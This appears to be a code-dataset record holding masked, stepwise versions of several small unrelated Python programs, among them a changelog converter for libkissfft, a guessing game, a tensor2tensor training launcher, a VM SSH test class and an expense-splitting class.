sys.stdout.write(signature_format.format(date=current_date))\n",
"step-4": "from datetime import datetime\nimport re\nimport sys\nMONTHS_REGEXP = (\n 'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'\n )\nre_entry_begin = re.compile(\n '(?P<version>[\\\\d.]+)[ :]*\\\\(?(?P<date>\\\\d\\\\d\\\\d\\\\d-\\\\d\\\\d-\\\\d\\\\d|(?:' +\n MONTHS_REGEXP + ') \\\\d\\\\d, \\\\d\\\\d\\\\d\\\\d)?\\\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = \"\"\" -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n\"\"\"\nVERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':\n '2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':\n '2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-5": "#!/usr/bin/env python3\nfrom datetime import datetime\nimport re\nimport sys\n\nMONTHS_REGEXP = ('Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|'\n 'January|February|March|April|June|July|August|September|October|November|December')\n\nre_entry_begin = re.compile(r'(?P<version>[\\d.]+)[ :]*\\(?(?P<date>\\d\\d\\d\\d-\\d\\d-\\d\\d|(?:'\n + MONTHS_REGEXP + r') \\d\\d, \\d\\d\\d\\d)?\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = ' -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\\n\\n'\n\n# Missing from CHANGELOG (found in hg log), or not parseable easily\nVERSION_DATES = {\n '1.2.8': '2008-08-22',\n '1.2.7': '2007-01-07',\n '1.2.2': '2005-05-06',\n '1.2.1': '2004-04-04',\n '1.1.1': '2004-02-01',\n '1.1': '2004-01-30',\n '0.4': '2003-11-04',\n '0.1': '2003-05-19',\n}\n\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\n\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n\n version = m.group('version')\n\n sys.stdout.write(header_format.format(version=version))\n\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n\n line_blank = not line.strip() or line.startswith(r'\\* *This Change Log was')\n\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n\n last_line_blank = line_blank\n\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
siswa_1 = Siswa('Afif', 'A.I.', 17, 'XII IPA')
siswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
<|reserved_special_token_1|>
from kelas import Siswa
siswa_1 = Siswa('Afif', 'A.I.', 17, 'XII IPA')
siswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
<|reserved_special_token_1|>
#import fungsi_saya as fs
# from fungsi_saya import kalkulator as k
# hasil = k(10,5,'+')
# print(hasil)
from kelas import Siswa
siswa_1 = Siswa('Afif', "A.I.", 17, 'XII IPA')
siswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
#print(Siswa.jum_siswa)
|
flexible
|
{
"blob_id": "bd2c327915c1e133a6e7b7a46290369440d50347",
"index": 3876,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsiswa_1 = Siswa('Afif', 'A.I.', 17, 'XII IPA')\nsiswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\n",
"step-3": "from kelas import Siswa\nsiswa_1 = Siswa('Afif', 'A.I.', 17, 'XII IPA')\nsiswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\n",
"step-4": "#import fungsi_saya as fs\n# from fungsi_saya import kalkulator as k\n\n# hasil = k(10,5,'+')\n# print(hasil)\n\nfrom kelas import Siswa\n\nsiswa_1 = Siswa('Afif', \"A.I.\", 17, 'XII IPA')\nsiswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\n#print(Siswa.jum_siswa)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
i = 0
real_value = 8
while i <= 3:
guess = int(input('Guess: '))
if guess == real_value:
print('You Win!')
break
else:
print('You lose')
|
normal
|
{
"blob_id": "70f2fc6873a78305c74e3c3ad04cb24d72019d56",
"index": 8738,
"step-1": "i = 0\nreal_value = 8\nwhile i <= 3:\n guess = int(input('Guess: '))\n if guess == real_value:\n print('You Win!')\n break\n else:\n print('You lose')\n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def problem_args(problem_name):
args = ['--generate_data', '--model=transformer',
'--hparams_set=transformer_librispeech_v1', '--problem=%s' %
problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %
problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %
problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %
problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']
return args
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def problem_args(problem_name):
args = ['--generate_data', '--model=transformer',
'--hparams_set=transformer_librispeech_v1', '--problem=%s' %
problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %
problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %
problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %
problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']
return args
def main():
sys.argv += problem_args('librispeech_clean_small')
t2t_trainer.main(None)
print('All done.')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def problem_args(problem_name):
args = ['--generate_data', '--model=transformer',
'--hparams_set=transformer_librispeech_v1', '--problem=%s' %
problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %
problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %
problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %
problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']
return args
def main():
sys.argv += problem_args('librispeech_clean_small')
t2t_trainer.main(None)
print('All done.')
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os
import sys
from tensor2tensor.bin import t2t_trainer
def problem_args(problem_name):
args = ['--generate_data', '--model=transformer',
'--hparams_set=transformer_librispeech_v1', '--problem=%s' %
problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %
problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %
problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %
problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']
return args
def main():
sys.argv += problem_args('librispeech_clean_small')
t2t_trainer.main(None)
print('All done.')
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os
import sys
from tensor2tensor.bin import t2t_trainer
def problem_args(problem_name):
args = [
'--generate_data',
'--model=transformer',
'--hparams_set=transformer_librispeech_v1',
'--problem=%s' % problem_name,
'--data_dir=/tmp/refactor_test/problems/%s/data' % problem_name,
'--tmp_dir=/tmp/refactor_test/problems/%s/tmp' % problem_name,
'--output_dir=/tmp/refactor_test/models/%s/data' % problem_name,
'--hparams=batch_shuffle_size=0,batch_size=1000000'
]
return args
def main():
sys.argv += problem_args('librispeech_clean_small')
# sys.argv += problem_args('common_voice')
t2t_trainer.main(None)
print('All done.')
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "cc5ad95419571d3eb2689b428e5805ad69958806",
"index": 4796,
"step-1": "<mask token>\n\n\ndef problem_args(problem_name):\n args = ['--generate_data', '--model=transformer',\n '--hparams_set=transformer_librispeech_v1', '--problem=%s' %\n problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %\n problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %\n problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %\n problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']\n return args\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef problem_args(problem_name):\n args = ['--generate_data', '--model=transformer',\n '--hparams_set=transformer_librispeech_v1', '--problem=%s' %\n problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %\n problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %\n problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %\n problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']\n return args\n\n\ndef main():\n sys.argv += problem_args('librispeech_clean_small')\n t2t_trainer.main(None)\n print('All done.')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef problem_args(problem_name):\n args = ['--generate_data', '--model=transformer',\n '--hparams_set=transformer_librispeech_v1', '--problem=%s' %\n problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %\n problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %\n problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %\n problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']\n return args\n\n\ndef main():\n sys.argv += problem_args('librispeech_clean_small')\n t2t_trainer.main(None)\n print('All done.')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os\nimport sys\nfrom tensor2tensor.bin import t2t_trainer\n\n\ndef problem_args(problem_name):\n args = ['--generate_data', '--model=transformer',\n '--hparams_set=transformer_librispeech_v1', '--problem=%s' %\n problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %\n problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %\n problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %\n problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']\n return args\n\n\ndef main():\n sys.argv += problem_args('librispeech_clean_small')\n t2t_trainer.main(None)\n print('All done.')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import os\nimport sys\n\nfrom tensor2tensor.bin import t2t_trainer\n\n\ndef problem_args(problem_name):\n\n args = [\n '--generate_data',\n '--model=transformer',\n '--hparams_set=transformer_librispeech_v1',\n '--problem=%s' % problem_name,\n '--data_dir=/tmp/refactor_test/problems/%s/data' % problem_name,\n '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' % problem_name,\n '--output_dir=/tmp/refactor_test/models/%s/data' % problem_name,\n '--hparams=batch_shuffle_size=0,batch_size=1000000'\n ]\n\n return args\n\n\ndef main():\n\n sys.argv += problem_args('librispeech_clean_small')\n # sys.argv += problem_args('common_voice')\n\n t2t_trainer.main(None)\n\n print('All done.')\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
print ("Hello"*5)
|
normal
|
{
"blob_id": "9ae7b6d081529a5c70b7362c852647b3638e7e98",
"index": 8105,
"step-1": "<mask token>\n",
"step-2": "print('Hello' * 5)\n",
"step-3": "print (\"Hello\"*5)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import unittest
import BasicVmLifecycleTestBase
class testVmIsAccessibleViaSsh(BasicVmLifecycleTestBase.
VmIsAccessibleViaSshTestBase):
vmName = 'cernvm'
timeout = 20 * 60
sshTimeout = 5 * 60
def suite():
return unittest.TestLoader().loadTestsFromTestCase(testVmIsAccessibleViaSsh
)
|
normal
|
{
"blob_id": "79e4e37fc17462508abf259e3a7861bd76797280",
"index": 9182,
"step-1": "<mask token>\n\n\nclass testVmIsAccessibleViaSsh(BasicVmLifecycleTestBase.\n VmIsAccessibleViaSshTestBase):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass testVmIsAccessibleViaSsh(BasicVmLifecycleTestBase.\n VmIsAccessibleViaSshTestBase):\n vmName = 'cernvm'\n timeout = 20 * 60\n sshTimeout = 5 * 60\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass testVmIsAccessibleViaSsh(BasicVmLifecycleTestBase.\n VmIsAccessibleViaSshTestBase):\n vmName = 'cernvm'\n timeout = 20 * 60\n sshTimeout = 5 * 60\n\n\ndef suite():\n return unittest.TestLoader().loadTestsFromTestCase(testVmIsAccessibleViaSsh\n )\n",
"step-4": "import unittest\nimport BasicVmLifecycleTestBase\n\n\nclass testVmIsAccessibleViaSsh(BasicVmLifecycleTestBase.\n VmIsAccessibleViaSshTestBase):\n vmName = 'cernvm'\n timeout = 20 * 60\n sshTimeout = 5 * 60\n\n\ndef suite():\n return unittest.TestLoader().loadTestsFromTestCase(testVmIsAccessibleViaSsh\n )\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
"""
复习
面向对象:考虑问题从对象的角度出发.
抽象:从多个事物中,舍弃个别的/非本质的特征(不重要),
抽出共性的本质(重要的)过程。
三大特征:
封装:将每个变化点单独分解到不同的类中。
例如:老张开车去东北
做法:定义人类,定义车类。
继承:重用现有类的功能和概念,并在此基础上进行扩展。
统一概念
例如:图形管理器,统计圆形/矩形.....面积。
做法:用图形类代表/约束,圆形/矩形..具有计算面积的方法.
多态:调用父"抽象的"方法,执行子类"具体的"方法.
重写:覆盖父类那个比较抽象的方法。
例如:图形管理器调用图形的计算面积方法
具体图形必须重写图形的计算面积方法。
继承是共性(计算面积),多态个性(长*宽 / pi *r**2)。
设计原则
开闭原则:允许增加新功能,不允许修改客户端代码.
单一职责:一个有且只有一个改变的原因.
依赖倒置:调用抽象(父),不要调用具体(子);
抽象不要依赖具体.
组合复用:如果仅仅是代码的复用,优先使用组合.
类与类关系
泛化[继承](做成爸爸)
关联(做成成员变量)
依赖(做成方法参数)
"""
|
normal
|
{
"blob_id": "2749a262bf8da99aa340e878c15a6dba01acc38c",
"index": 7025,
"step-1": "<mask token>\n",
"step-2": "\"\"\"\n 复习\n 面向对象:考虑问题从对象的角度出发.\n 抽象:从多个事物中,舍弃个别的/非本质的特征(不重要),\n 抽出共性的本质(重要的)过程。\n 三大特征:\n 封装:将每个变化点单独分解到不同的类中。\n 例如:老张开车去东北\n 做法:定义人类,定义车类。\n\n 继承:重用现有类的功能和概念,并在此基础上进行扩展。\n 统一概念\n 例如:图形管理器,统计圆形/矩形.....面积。\n 做法:用图形类代表/约束,圆形/矩形..具有计算面积的方法.\n\n 多态:调用父\"抽象的\"方法,执行子类\"具体的\"方法.\n 重写:覆盖父类那个比较抽象的方法。\n 例如:图形管理器调用图形的计算面积方法\n 具体图形必须重写图形的计算面积方法。\n 继承是共性(计算面积),多态个性(长*宽 / pi *r**2)。\n\n 设计原则\n 开闭原则:允许增加新功能,不允许修改客户端代码.\n 单一职责:一个有且只有一个改变的原因.\n 依赖倒置:调用抽象(父),不要调用具体(子);\n 抽象不要依赖具体.\n 组合复用:如果仅仅是代码的复用,优先使用组合.\n\n 类与类关系\n 泛化[继承](做成爸爸)\n 关联(做成成员变量)\n 依赖(做成方法参数)\n\"\"\"",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
class people:
<|reserved_special_token_0|>
def add_purchase(self, purchase):
self.purchases.append(purchase)
def add_description(self, description):
self.purchase_descrip.append(description)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def set_total(self):
self.total_spent = 0
for items in self.purchases:
self.total_spent = self.total_spent + float(items)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def add_purchase_descrip(self, price, description):
self.purchase_price_descrip.append('$' + str(price) + ' ' +
description)
def get_purchase_descrip(self):
return self.purchase_price_descrip
def set_debt(self, cost_per_person):
self.debt = float(self.total_spent) - cost_per_person
def get_debt(self):
return self.debt
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_pay_who(self):
return self.pay_who
def set_debt_temp(self):
self.debt_temp = self.debt
def get_temp_debt(self):
return self.debt_temp
<|reserved_special_token_0|>
def pay_temp_debt(self, payment):
self.debt_temp - payment
def round_payments(self):
for x in range(0, len(self.pay)):
self.pay[x] = round(self.pay[x], 2)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class people:
<|reserved_special_token_0|>
def add_purchase(self, purchase):
self.purchases.append(purchase)
def add_description(self, description):
self.purchase_descrip.append(description)
def get_purchase(self):
return self.purchases
<|reserved_special_token_0|>
def set_total(self):
self.total_spent = 0
for items in self.purchases:
self.total_spent = self.total_spent + float(items)
def get_total(self):
return self.total_spent
<|reserved_special_token_0|>
def add_purchase_descrip(self, price, description):
self.purchase_price_descrip.append('$' + str(price) + ' ' +
description)
def get_purchase_descrip(self):
return self.purchase_price_descrip
def set_debt(self, cost_per_person):
self.debt = float(self.total_spent) - cost_per_person
def get_debt(self):
return self.debt
def add_payment(self, payment):
self.pay.append(payment)
<|reserved_special_token_0|>
def add_pay_who(self, who_to_pay):
self.pay_who.append(who_to_pay)
def get_pay_who(self):
return self.pay_who
def set_debt_temp(self):
self.debt_temp = self.debt
def get_temp_debt(self):
return self.debt_temp
def update_temp_debt(self, payment):
self.debt_temp = self.debt_temp + payment * -1
def pay_temp_debt(self, payment):
self.debt_temp - payment
def round_payments(self):
for x in range(0, len(self.pay)):
self.pay[x] = round(self.pay[x], 2)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class people:
def __init__(self, name):
self.name = name
self.purchase_descrip = []
self.purchase_price_descrip = []
self.purchases = []
self.total_spent = 0
self.debt = 0
self.debt_temp = 0
self.pay = []
self.pay_out = []
self.pay_who = []
def add_purchase(self, purchase):
self.purchases.append(purchase)
def add_description(self, description):
self.purchase_descrip.append(description)
def get_purchase(self):
return self.purchases
<|reserved_special_token_0|>
def set_total(self):
self.total_spent = 0
for items in self.purchases:
self.total_spent = self.total_spent + float(items)
def get_total(self):
return self.total_spent
<|reserved_special_token_0|>
def add_purchase_descrip(self, price, description):
self.purchase_price_descrip.append('$' + str(price) + ' ' +
description)
def get_purchase_descrip(self):
return self.purchase_price_descrip
def set_debt(self, cost_per_person):
self.debt = float(self.total_spent) - cost_per_person
def get_debt(self):
return self.debt
def add_payment(self, payment):
self.pay.append(payment)
<|reserved_special_token_0|>
def add_pay_who(self, who_to_pay):
self.pay_who.append(who_to_pay)
def get_pay_who(self):
return self.pay_who
def set_debt_temp(self):
self.debt_temp = self.debt
def get_temp_debt(self):
return self.debt_temp
def update_temp_debt(self, payment):
self.debt_temp = self.debt_temp + payment * -1
def pay_temp_debt(self, payment):
self.debt_temp - payment
def round_payments(self):
for x in range(0, len(self.pay)):
self.pay[x] = round(self.pay[x], 2)
def round_purchases(self):
for x in range(0, len(self.purchases)):
self.purchases[x] = round(float(self.purchases[x]), 2)
<|reserved_special_token_1|>
class people:
def __init__(self, name):
self.name = name
self.purchase_descrip = []
self.purchase_price_descrip = []
self.purchases = []
self.total_spent = 0
self.debt = 0
self.debt_temp = 0
self.pay = []
self.pay_out = []
self.pay_who = []
def add_purchase(self, purchase):
self.purchases.append(purchase)
def add_description(self, description):
self.purchase_descrip.append(description)
def get_purchase(self):
return self.purchases
<|reserved_special_token_0|>
def set_total(self):
self.total_spent = 0
for items in self.purchases:
self.total_spent = self.total_spent + float(items)
def get_total(self):
return self.total_spent
def get_name(self):
return self.name
def add_purchase_descrip(self, price, description):
self.purchase_price_descrip.append('$' + str(price) + ' ' +
description)
def get_purchase_descrip(self):
return self.purchase_price_descrip
def set_debt(self, cost_per_person):
self.debt = float(self.total_spent) - cost_per_person
def get_debt(self):
return self.debt
def add_payment(self, payment):
self.pay.append(payment)
def get_pay(self):
return self.pay
def add_pay_who(self, who_to_pay):
self.pay_who.append(who_to_pay)
def get_pay_who(self):
return self.pay_who
def set_debt_temp(self):
self.debt_temp = self.debt
def get_temp_debt(self):
return self.debt_temp
def update_temp_debt(self, payment):
self.debt_temp = self.debt_temp + payment * -1
def pay_temp_debt(self, payment):
self.debt_temp - payment
def round_payments(self):
for x in range(0, len(self.pay)):
self.pay[x] = round(self.pay[x], 2)
def round_purchases(self):
for x in range(0, len(self.purchases)):
self.purchases[x] = round(float(self.purchases[x]), 2)
<|reserved_special_token_1|>
class people:
def __init__(self, name):
self.name = name
self.purchase_descrip = []
self.purchase_price_descrip = []
self.purchases = []
self.total_spent = 0
self.debt = 0
self.debt_temp = 0
self.pay = []
self.pay_out = []
self.pay_who = []
def add_purchase(self, purchase):
self.purchases.append(purchase)
def add_description(self, description):
self.purchase_descrip.append(description)
def get_purchase(self):
return self.purchases
def get_description(self):
return self.purchase_descrip
def set_total(self):
self.total_spent = 0
for items in self.purchases:
self.total_spent = self.total_spent+float(items)
def get_total(self):
return self.total_spent
def get_name(self):
return self.name
def add_purchase_descrip(self, price, description):
self.purchase_price_descrip.append("$"+str(price)+" "+description)
def get_purchase_descrip(self):
return self.purchase_price_descrip
def set_debt(self, cost_per_person):
self.debt = float(self.total_spent)-cost_per_person
def get_debt(self):
return self.debt
def add_payment(self, payment):
self.pay.append(payment)
def get_pay(self):
return self.pay
def add_pay_who(self, who_to_pay):
self.pay_who.append(who_to_pay)
def get_pay_who(self):
return self.pay_who
def set_debt_temp(self):
self.debt_temp = self.debt
def get_temp_debt(self):
return self.debt_temp
def update_temp_debt(self, payment):
self.debt_temp = self.debt_temp+payment*-1
def pay_temp_debt(self, payment):
self.debt_temp-payment
def round_payments(self):
for x in range(0, len(self.pay)):
self.pay[x] = round(self.pay[x], 2)
def round_purchases(self):
for x in range(0, len(self.purchases)):
self.purchases[x] = round(float(self.purchases[x]), 2)
|
flexible
|
{
"blob_id": "bdda42665acfefccad45a2b49f5436a186140579",
"index": 8576,
"step-1": "class people:\n <mask token>\n\n def add_purchase(self, purchase):\n self.purchases.append(purchase)\n\n def add_description(self, description):\n self.purchase_descrip.append(description)\n <mask token>\n <mask token>\n\n def set_total(self):\n self.total_spent = 0\n for items in self.purchases:\n self.total_spent = self.total_spent + float(items)\n <mask token>\n <mask token>\n\n def add_purchase_descrip(self, price, description):\n self.purchase_price_descrip.append('$' + str(price) + ' ' +\n description)\n\n def get_purchase_descrip(self):\n return self.purchase_price_descrip\n\n def set_debt(self, cost_per_person):\n self.debt = float(self.total_spent) - cost_per_person\n\n def get_debt(self):\n return self.debt\n <mask token>\n <mask token>\n <mask token>\n\n def get_pay_who(self):\n return self.pay_who\n\n def set_debt_temp(self):\n self.debt_temp = self.debt\n\n def get_temp_debt(self):\n return self.debt_temp\n <mask token>\n\n def pay_temp_debt(self, payment):\n self.debt_temp - payment\n\n def round_payments(self):\n for x in range(0, len(self.pay)):\n self.pay[x] = round(self.pay[x], 2)\n <mask token>\n",
"step-2": "class people:\n <mask token>\n\n def add_purchase(self, purchase):\n self.purchases.append(purchase)\n\n def add_description(self, description):\n self.purchase_descrip.append(description)\n\n def get_purchase(self):\n return self.purchases\n <mask token>\n\n def set_total(self):\n self.total_spent = 0\n for items in self.purchases:\n self.total_spent = self.total_spent + float(items)\n\n def get_total(self):\n return self.total_spent\n <mask token>\n\n def add_purchase_descrip(self, price, description):\n self.purchase_price_descrip.append('$' + str(price) + ' ' +\n description)\n\n def get_purchase_descrip(self):\n return self.purchase_price_descrip\n\n def set_debt(self, cost_per_person):\n self.debt = float(self.total_spent) - cost_per_person\n\n def get_debt(self):\n return self.debt\n\n def add_payment(self, payment):\n self.pay.append(payment)\n <mask token>\n\n def add_pay_who(self, who_to_pay):\n self.pay_who.append(who_to_pay)\n\n def get_pay_who(self):\n return self.pay_who\n\n def set_debt_temp(self):\n self.debt_temp = self.debt\n\n def get_temp_debt(self):\n return self.debt_temp\n\n def update_temp_debt(self, payment):\n self.debt_temp = self.debt_temp + payment * -1\n\n def pay_temp_debt(self, payment):\n self.debt_temp - payment\n\n def round_payments(self):\n for x in range(0, len(self.pay)):\n self.pay[x] = round(self.pay[x], 2)\n <mask token>\n",
"step-3": "class people:\n\n def __init__(self, name):\n self.name = name\n self.purchase_descrip = []\n self.purchase_price_descrip = []\n self.purchases = []\n self.total_spent = 0\n self.debt = 0\n self.debt_temp = 0\n self.pay = []\n self.pay_out = []\n self.pay_who = []\n\n def add_purchase(self, purchase):\n self.purchases.append(purchase)\n\n def add_description(self, description):\n self.purchase_descrip.append(description)\n\n def get_purchase(self):\n return self.purchases\n <mask token>\n\n def set_total(self):\n self.total_spent = 0\n for items in self.purchases:\n self.total_spent = self.total_spent + float(items)\n\n def get_total(self):\n return self.total_spent\n <mask token>\n\n def add_purchase_descrip(self, price, description):\n self.purchase_price_descrip.append('$' + str(price) + ' ' +\n description)\n\n def get_purchase_descrip(self):\n return self.purchase_price_descrip\n\n def set_debt(self, cost_per_person):\n self.debt = float(self.total_spent) - cost_per_person\n\n def get_debt(self):\n return self.debt\n\n def add_payment(self, payment):\n self.pay.append(payment)\n <mask token>\n\n def add_pay_who(self, who_to_pay):\n self.pay_who.append(who_to_pay)\n\n def get_pay_who(self):\n return self.pay_who\n\n def set_debt_temp(self):\n self.debt_temp = self.debt\n\n def get_temp_debt(self):\n return self.debt_temp\n\n def update_temp_debt(self, payment):\n self.debt_temp = self.debt_temp + payment * -1\n\n def pay_temp_debt(self, payment):\n self.debt_temp - payment\n\n def round_payments(self):\n for x in range(0, len(self.pay)):\n self.pay[x] = round(self.pay[x], 2)\n\n def round_purchases(self):\n for x in range(0, len(self.purchases)):\n self.purchases[x] = round(float(self.purchases[x]), 2)\n",
